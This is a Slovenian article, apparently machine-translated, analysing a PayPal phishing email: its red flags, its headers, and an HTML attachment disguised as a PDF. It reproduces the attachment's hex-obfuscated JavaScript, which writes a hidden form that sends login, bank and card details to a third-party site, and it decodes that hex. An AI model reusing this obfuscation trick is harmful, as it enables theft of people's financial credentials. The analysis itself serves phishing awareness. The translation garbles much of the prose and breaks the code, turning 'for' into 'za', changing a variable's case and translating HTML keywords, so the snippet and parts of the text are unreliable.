10Sep
V današnjem svetu, kjer so vsi podatki na spletu, je phishing eden izmed najbolj priljubljenih in uničujočih spletnih napadov, saj lahko vedno očistite virus, vendar če ste ukradli svoje bančne podatke, ste v težavah. Tukaj je razčlenitev ene takega napada, ki smo ga prejeli.
Ne mislite, da so pomembni samo vaši bančni podatki: navsezadnje, če nekdo pridobi nadzor nad prijavo v račun, ne poznajo le informacij, ki jih vsebuje ta račun, vendar so verjetnosti, da se iste informacije za prijavo lahko uporabijo na različnihdrugi računi. In če ogrozijo vaš e-poštni račun, lahko ponastavijo vsa druga gesla.
Torej, poleg ohranjanja močnih in različnih gesel, morate biti vedno pozorni na lažne e-poštne sporočila, ki so maskirana kot prava stvar. Medtem ko je večina lažnih poskusov amaterskih, so nekateri prepričljivi, zato je pomembno razumeti, kako jih prepoznati na površini in kako delujejo pod pokrovom.
Slika asirap
Preverjanje, kaj je v navadnem vidu
Elektronski naslov primera, tako kot večina poskusov lažnega predstavljanja, vas "opozori" na dejavnost v vašem računu PayPal, ki bi bila v normalnih okoliščinah zaskrbljujoča. Zato je poziv k dejanju, da potrdite / obnovite svoj račun tako, da pošljete skoraj vsak kos osebnih podatkov, ki jih lahko zamislite.Še enkrat, to je precej formulirano.
Medtem ko zagotovo obstajajo izjeme, je skoraj vsak phishing in prevara e-pošte naložen z rdečo zastavico neposredno v samem sporočilu. Tudi če je besedilo prepričljivo, lahko ponavadi najdete veliko napak, ki so po celotnem sporočilnem sporočilu označene, da sporočilo ni legitimno.
Sporočilo telo
Na prvi pogled je to ena od boljših e-poštnih sporočil, ki sem jih videl. Ni črkovanja ali slovničnih napak in beseda se bere glede na to, kaj bi lahko pričakovali. Vendar pa je nekaj rdečih zastav, ki jih lahko vidite, ko preučite vsebino malo bolj natančno.
- "Paypal" - pravi primer je "PayPal"( kapital P).V sporočilu lahko vidite obe različici. Podjetja so zelo premišljena s svojo blagovno znamko, zato je dvomljivo, da bi nekaj takega opravilo postopek preverjanja.
- "omogoči ActiveX" - Kolikokrat ste videli zakonito spletno podjetje, velikost Paypala uporablja lastniško komponento, ki deluje samo v enem brskalniku, zlasti če podpirajo več brskalnikov? Seveda, nekje tam nekje podjetje, toda to je rdeča zastava.
- "varno." - Opazujte, kako se ta beseda ne ujema z robom z ostalim besedilom odstavka. Tudi če malo okno raztegnem okno, se ne preklopi pravilno ali pravilno.
- "Paypal!" - Prostor, preden je klicaj videti nerodno. Samo še ena funkcija, ki sem prepričana, da ne bi bila v legitimnem e-poštnem sporočilu.
- "PayPal-Account Update Form.pdf.htm" - Zakaj bi Paypal priložil "PDF", še posebej, če bi lahko le povezali s stranjo na njihovi spletni strani? Poleg tega zakaj bi skušali prikriti datoteko HTML kot PDF?To je največja rdeča zastava vseh.
Glava sporočil
Ko pogledate glavo glave, se prikaže nekaj več rdečih zastavic:
- Od naslova je [email protected].
- Ni naslova za naslov. Tega nisem zapiral, preprosto ni del standardnega glava sporočila. Običajno podjetje, ki ima vaše ime, vam bo osebno poslalo e-poštno sporočilo.
Priloga
Ko odprete prilogo, lahko takoj vidite, da postavitev ni pravilna, saj manjkajo podatki o slogu. Again, zakaj bi PayPal poslal obrazec HTML, ko bi vam lahko preprosto dali povezavo na njihovi spletni strani?
Opomba: smo za to vgrajeni vgrajeni pripomoček za priloge HTML uporabljali, vendar priporočamo, da NE odprete priloge iz scammers-a. Nikoli. Kdaj. Zelo pogosto vsebujejo izkoriščanja, ki bodo v računalniku namestili trojance, da bi ukradli podatke o vašem računu.
Če se pomaknete še malo več, lahko vidite, da ta obrazec zahteva ne samo za naše podatke za prijavo v PayPal, ampak tudi za bančne in kreditne kartice. Nekatere slike so pokvarjene.
Očitno je, da ta poskus lažnega predstavljanja sledi vsem z enim samomorekom.
Tehnična razdelitev
Čeprav bi moralo biti precej jasno na podlagi tega, kar je jasno, da gre za poskus lažnega predstavljanja, bomo zdaj razčlenili tehnični sestavek e-pošte in videli, kaj lahko najdemo.
Informacije iz priloge
Prva stvar, ki jo je treba ogledati, je vir HTML obrazca za prilogo, ki predstavlja podatke na neustrezno spletno mesto.
Ko hitro pregledujete vir, se vse povezave zdijo veljavne, saj kažejo na "paypal.com" ali "paypalobjects.com", ki sta prav tako legitimna.
Zdaj si bomo ogledali nekaj osnovnih informacij o Firefoxu, ki se zberejo na strani.
Kot vidite, se nekatere grafike povlečejo iz domen "blagoslov", "goodhealthpharmacy.com" in "pic-upload.de" namesto zakonitih domen PayPal.
Informacije iz naslovov za elektronsko pošto
Nato bomo si ogledali glavne naslove neobdelanih e-poštnih sporočil. Gmail omogoča, da je to na voljo v meniju Show Original v sporočilu.
Če pogledamo podatke o glavi za izvirno sporočilo, lahko vidite, da je bilo to sporočilo sestavljeno z uporabo programa Outlook Express 6. Dvomim, da ima PayPal nekoga v osebju, ki ročno pošilja vsako od teh sporočil preko zastarelega e-poštnega odjemalca.
Zdaj, ko pogledamo informacije o usmerjanju, lahko vidimo naslov IP tako pošiljatelja kot oddajnega poštnega strežnika.
IP naslov "Uporabnik" je izvirni pošiljatelj. Hitro iskanje informacij IP, lahko vidimo, da je pošiljatelj IP v Nemčiji.
Ko pogledamo poštni strežnik poštnega strežnika( mail.itak.at), lahko naslov IP vidimo, da je to ISP s sedežem v Avstriji. Dvomim, da PayPal usmerja svoja e-poštna sporočila neposredno preko avstrijskega ponudnika internetnih storitev, kadar imajo veliko strežniško farmo, ki bi lahko preprosto ravnala s to nalogo.
Kje se podatki dogajajo?
Tako smo jasno določili, da je to lažno e-poštno sporočilo in zbrali nekaj informacij o tem, od kod izvira sporočilo, a kaj pa, kje se pošljejo podatki?
Če želite videti to, najprej shranimo prilogo HTM na namizje in odprite v urejevalniku besedil.Če se pomikate po njej, se zdi, da je vse v redu, razen če pridemo do sumljivega bloka javascripta.
Razkrijemo celoten vir zadnjega bloka Javascripta, vidimo:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x = "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; Y = "; za( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Kadarkoli vidite velik prepleten niz navidezno naključnih črk in številk, vdelanih v blok Javascript, je ponavadi nekaj sumljivega.Če pogledamo kodo, je spremenljivka "x" nastavljena na ta velik niz in se nato dekodira v spremenljivko "y".Končni rezultat spremenljivke "y" je nato zapisan v dokument kot HTML.
Od velikega niz je iz številke 0-9 in črke AF, je najbolj verjetno, kodiran s preprostim ASCII do konverzije Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
pomeni, da:
& lt; ime oblika = "glavni" id = "glavni"method = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Ni naključje, da se to dekodira v veljavno oznako HTML, ki rezultate ne pošlje v PayPal, ampak na prevarantsko spletno mesto.
Poleg tega, ko si ogledate vir HTML obrazca, boste videli, da ta oznaka obrazca ni vidna, ker se dinamično generira prek Javascripta. To je pameten način, da skrijete, kaj dejansko počne HTML, če bi nekdo preprosto ogledal ustvarjeni vir priloge( kot smo to storili prej), v nasprotju z odpiranjem priloge neposredno v urejevalniku besedil.
Z brskalnikom, ki je na mestu, ki je kršil, lahko vidimo, da je to domena, ki jo gostijo priljubljeni spletni strežniki, 1and1.
Izstopa, ker domena uporablja berljivo ime( v nasprotju z nekaj, kar je "dfh3sjhskjhw.net") in domena je bila registrirana že 4 leta. Zaradi tega verjamem, da je bila ta domena ugrabljena in uporabljena kot pawn v tem poskusu lažnega predstavljanja.
Cinizem je dobra obramba
Ko gre za varno spletno, nikoli ne boli, da bi imela dober košček cinizma.
Med tem, ko sem prepričan, da v primernem e-poštnem sporočilu obstaja več rdečih zastav, smo pokazali kazalnike, ki smo jih videli šele po nekaj minutah pregleda. Hipotetično, če bi površinska raven elektronske pošte simbolizirala legitimno nasprotno 100%, bi tehnična analiza še vedno razkrila njegovo resnično naravo. To je razlog, zakaj je uvoz, da bi lahko preučili, kaj lahko in ne more videti.